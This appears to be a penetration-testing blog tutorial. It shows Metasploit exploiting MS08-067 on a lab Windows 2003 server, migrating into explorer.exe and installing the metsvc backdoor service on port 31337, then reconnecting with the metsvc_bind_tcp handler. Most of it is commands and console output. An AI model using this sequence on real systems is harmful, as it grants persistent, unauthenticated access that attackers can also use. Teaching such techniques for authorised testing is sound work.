1st February 2023

MSF Meterpreter Backdoor – What is metsvc?

After logging into the target system, one way to maintain persistence is to use the metsvc service. With this service, you can re-login Meterpreter whenever you want. Anyone who finds the corresponding port of the computer where you place this service can use this backdoor. You should cancel it after using it during the pentest process, otherwise, you will make the system open to malicious people. This will not please the system owners.

Meterpreter session

First of all, let’s open a meterpreter session using the module related to a gap you have found.

msf5 exploit(windows/smb/ms08_067_netapi) > exploit 

[*] 192.168.254.32:445 - Automatically detecting the target...
[*] 192.168.254.32:445 - Fingerprint: Windows 2003 -  - lang:Unknown
[*] 192.168.254.32:445 - Selected Target: Windows 2003 SP0 Universal
[*] 192.168.254.32:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.254.32:4444
[*] Sending stage (176195 bytes) to 192.168.254.32
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.254.32:4444) at 2020-10-14 06:45:20 -0400

meterpreter >
Meterpreter session
Meterpreter session

 

Let’s find the PID number of the Explorer.exe program with the ps command and switch to this PID numbered program with the migrate command.

meterpreter > ps
                                                                                                                                
Process List                                                                                                                    
============                                                                                                                    
                                                                                                                                
 PID   PPID  Name              Arch  Session  User                          Path                                               
 ---   ----  ----              ----  -------  ----                          ----                                               
 0     0     [System Process]                                                                                                  
 4     0     System            x86   0        NT AUTHORITY\SYSTEM                                                              
 308   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe                      
 456   308   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe                  
 488   308   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe               
 532   488   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe                    
 544   488   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe                       
 728   532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe       
 768   532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 788   532   vmacthlp.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 924   532   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 940   532   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 956   532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1020  728   wmiprvse.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\wbem\wmiprvse.exe
 1140  532   dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 1156  532   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1184  532   msdtc.exe         x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 1300  532   appmgr.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\serverappliance\appmgr.exe
 1320  532   dns.exe           x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\dns.exe
 1360  532   elementmgr.exe    x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\serverappliance\elementmgr.exe
 1384  532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1436  532   inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1476  532   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1508  532   tcpsvcs.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\tcpsvcs.exe
 1544  532   snmp.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\snmp.exe
 1584  532   srvcsurg.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\serverappliance\srvcsurg.exe
 1616  532   vmtoolsd.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1832  532   wins.exe          x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\wins.exe
 1884  532   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Dfssvc.exe
 1936  532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2196  2136  explorer.exe      x86   0        SRV2003\omers                 C:\WINDOWS\Explorer.EXE
 2204  956   cmd.exe           x86   0        SRV2003\omers                 C:\WINDOWS\system32\cmd.exe
 2324  2196  vmtoolsd.exe      x86   0        SRV2003\omers                 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2332  2196  ctfmon.exe        x86   0        SRV2003\omers                 C:\WINDOWS\system32\ctfmon.exe
 2340  2196  mshta.exe         x86   0        SRV2003\omers                 C:\WINDOWS\system32\mshta.exe

meterpreter > migrate 2196
[*] Migrating from 956 to 2196...                                                                                 
[*] Migration completed successfully.

 

LEARN MORE  Microsoft Exchange Server 2010/2013/2016/2019 Versions - Unable to Connect to Owa/Ecp "Protectioncertificates.Length<1" Error and Solution
msf ps and migrate
msf ps and migrate

 

metsvc -h

Before using the metsvc module, view the help and see what possibilities it offers us.

meterpreter > run metsvc -h
                                                                                                                  
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.                                    
[!] Example: run exploit/windows/local/persistence OPTION=value [...]                                             
                                                                                                                  
OPTIONS:                                                                                                   
                                                                                                           
    -A        Automatically start a matching exploit/multi/handler to connect to the service               
    -h        This help menu                                                                               
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)                   
                                                                                                           
meterpreter >

 

metsvc -h
metsvc -h

 

Run metsvc

metsvc is a program that normally provides backlinks to us, but since we are already logged in Meterpreter, we don’t need backlinks for now. Let’s just run the program.

meterpreter > run metsvc 

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\omers\LOCALS~1\Temp\AvKjIdraPbWm...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter > 

 

Run metsvc
Run metsvc

 

Communication with metsvc Service

metsvc has started and is now waiting to connect. We can see how to communicate with this service.

We will use the payload module “windows/metsvc_bind_tcp” to communicate with metsvc in the listening state on the target system. We will activate the module as in the example below and make the necessary PORT settings.

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) >set payload windows/metsvc_bind_tcp 
payload => windows/metsvc_bind_tcp
msf5 exploit(multi/handler) > set lport 31337
lport => 31337
msf5 exploit(multi/handler) > set rhost 192.168.254.32
rhost => 192.168.254.32
msf5 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     31337            yes       The listen port
   RHOST     192.168.254.32   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > exploit 

[*] Started bind TCP handler against 192.168.254.32:31337
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.254.32:31337) at 2020-10-14 10:25:06 -0400
[*] 192.168.254.32 - Meterpreter session 1 closed.  Reason: Died
Communication with metsvc Service
Communication with metsvc Service

 

LEARN MORE  How to Grant Root User with SSH Access to McAfee Active Response(MAR) Server?

PID number of metsvc service

As you can see, session 1 was opened automatically. We will look at which PID number the metsvc service runs on the target computer.

As can be seen from the printout, the metsvc program works with a 2560 PID number. Now, whenever you want, we can connect to the program listening on the target computer using the windows/metsvc_bind_tcp payload module.

Note: We recommend that you delete the metsvc program from the system when your security test is complete.

meterpreter > ps
                                                                                                           
Process List                                                                                               
============                                                                                               

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]                                      
 4     0     System            x86   0                             
 308   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 456   308   csrss.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
 488   308   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
 532   488   services.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 544   488   lsass.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
 728   532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
 768   532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 788   532   vmacthlp.exe      x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 924   532   svchost.exe       x86   0                             C:\WINDOWS\system32\svchost.exe
 940   532   svchost.exe       x86   0                             C:\WINDOWS\system32\svchost.exe
 956   532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1020  728   wmiprvse.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1140  532   dllhost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\dllhost.exe
 1156  532   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
 1184  532   msdtc.exe         x86   0                             C:\WINDOWS\system32\msdtc.exe
 1300  532   appmgr.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\serverappliance\appmgr.exe
 1320  532   dns.exe           x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\dns.exe
 1360  532   elementmgr.exe    x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\serverappliance\elementmgr.exe
 1384  532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1436  532   inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1476  532   svchost.exe       x86   0                             C:\WINDOWS\system32\svchost.exe
 1508  532   tcpsvcs.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\tcpsvcs.exe
 1544  532   snmp.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\snmp.exe
 1584  532   srvcsurg.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\serverappliance\srvcsurg.exe
 1616  532   vmtoolsd.exe      x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1832  532   wins.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\wins.exe
 1884  532   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\Dfssvc.exe
 1936  532   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 2196  2136  explorer.exe      x86   0        SRV2003\omers        C:\WINDOWS\Explorer.EXE
 2324  2196  vmtoolsd.exe      x86   0        SRV2003\omers        C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2332  2196  ctfmon.exe        x86   0        SRV2003\omers        C:\WINDOWS\system32\ctfmon.exe
 2340  2196  mshta.exe         x86   0        SRV2003\omers        C:\WINDOWS\system32\mshta.exe
 2560  532   metsvc.exe        x86   0        NT AUTHORITY\SYSTEM  C:\DOCUME~1\omers\LOCALS~1\Temp\AvKjIdraPbWm\metsvc.exe
 2788  2196  cmd.exe           x86   0        SRV2003\omers        C:\WINDOWS\system32\cmd.exe

meterpreter > 
PID number of metsvc service
PID number of metsvc service

Leave a Reply

Your email address will not be published. Required fields are marked *